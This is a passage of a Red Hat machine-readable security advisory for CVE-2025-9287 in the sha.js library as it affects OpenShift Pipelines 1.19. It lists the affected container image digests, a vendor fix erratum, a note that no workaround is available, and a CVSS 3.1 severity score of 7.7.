"category": "external",
"summary": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5",
"url": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
}
],
"release_date": "2025-08-20T21:59:44.728000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
